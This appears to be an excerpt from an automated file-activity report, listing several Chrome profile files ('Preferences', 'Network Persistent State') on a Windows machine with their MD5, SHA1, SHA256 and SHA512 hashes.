SHA256 f96bd3a2d53c1d9e98176b16f56e61fe9d08f30a6777395870c935e2da6daa49
SHA512 d32be7602f05466db38bef451091d3440837c2cd68356a8f4785d105e64d9c4aaa6932e5b0216b1b503bdff3c5a6953731d68054307712458c713930fa1b6a4c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 69d573e4a1686d17a0d1319d34cb0872
SHA1 43045018375610b17484d6219ed688206a87e8b4
SHA256 9fc01a0d72d5141e597cad123455d84cdf591a41654b4832f7d86583c154d2c1
SHA512 a1a3095a15866069389123a64c88492df428335e857c2571a188813a4b575426ed233fb63b8b3342949aea7aa7d64c70855de6dfa561094bf3f75b053d2acef2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 95b85e42b000516342eca0a638311a45
SHA1 cbcd3e382be2f0210f685db2a06a986cf43c6347
SHA256 b8ec805af4c22c7c7d5c9eb8ee9fd229bc3cfab1484db3da9105716247565da7
SHA512 b6d58206bf3c062d4dbcf2ba935410315353ca66ed138d74b95a7c831ccef891f8b5ca0d788610d1502df283f154f4b127ffd6f0fc28f17ecf77d4120537ec0e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7968a1add4ef9d94de5622ada11a9f62
SHA1 935ed348eba004ccfb4811250d1bb81c5f3c99ce
SHA256 ce239d1ce1df4a69329e0720333b7e8ea6b76f045d6ab074430c5f96a8b66120
SHA512 c13a069f8790f1da14bb82a33a2d4e468f2030341d7fb7521e6417c5af8faa4ce11022682f5968232811b326515d38feac949084021994c73790b02b67b65719

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3f5be399796e9fd12738f306c9d1a7f8
SHA1 0cae79b04d599b0ed73fbff4024c5aa1f916f9b9
SHA256 77d97f4269ce00d75c78754fc08e2008bd29d0b6f9c913f8e1134b9ade0c3110
SHA512 6d46b1a3754c4ffebf65781e2ca47318af4b8304c949eade9ff856c5a6dbedd19ab1f8753ad81fc57cf58f554514ffa3491e07e31e756c98fa4094e3e798242d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c325e170f6d796e57b7f9217c57cf9e1
SHA1 fc10ae53f2a8df3bf49cac4a1efd953a0ce245ad
SHA256 2e92031743265c5c377ce6fc7a7322f50519d91c4a0f0671013f94db98d51daa
SHA512 50fa374d084ee812d85e8d5ec23cd67c97b717b7aefdff88496cba8456640f2542a297bdb034b5c37b3ac70414784042d3378c33f1535a82b2564e7da3595a11